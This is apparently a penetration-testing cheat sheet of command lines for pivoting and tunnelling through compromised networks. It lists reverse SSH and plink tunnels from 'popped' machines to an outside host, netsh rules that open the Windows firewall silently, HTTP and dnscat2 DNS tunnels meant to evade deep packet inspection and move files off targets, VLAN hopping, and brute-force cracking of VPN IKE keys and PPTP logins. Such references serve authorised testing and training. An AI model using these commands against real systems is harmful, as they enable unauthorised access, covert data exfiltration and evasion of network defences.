A Penetration Testing Framework
apt-get install rinetd
cat /etc/rinetd.conf
# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
ssh -D <local proxy port> -p <remote port> <target>
Proxychains - Perform nmap scan within a DMZ from an external computer
Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
proxychains nmap --top-ports=20 -sT -Pn $ip/24
nc -vvn $ip 8888
Traffic Encapsulation - Bypassing deep packet inspection
http tunnel
sudo hts -F <server ip addr>:<port of your app> 80
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
httptunnel_client.exe
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
VPN Hacking
Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
./udp-protocol-scanner.pl -p ike -f ip.txt
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan –M –A –n example\_group -P hash-file.txt TARGET-I
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP Hacking
Identifying PPTP, it listens on TCP: 1723 NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
Port Forwarding/Redirection
PuTTY Link tunnel - SSH Tunneling
Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host>
SSH Pivoting
SSH pivoting from one network to another:
ssh -D <local host>:1010 -p 22 user@<remote host>
DNS Tunneling
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
Attacking Machine Installation:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle instal
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
(https://downloads.skullsecurity.org/dnscat2/)
(https://github.com/lukebaggett/dnscat2-powershell/)
dnscat --host <dnscat server ip>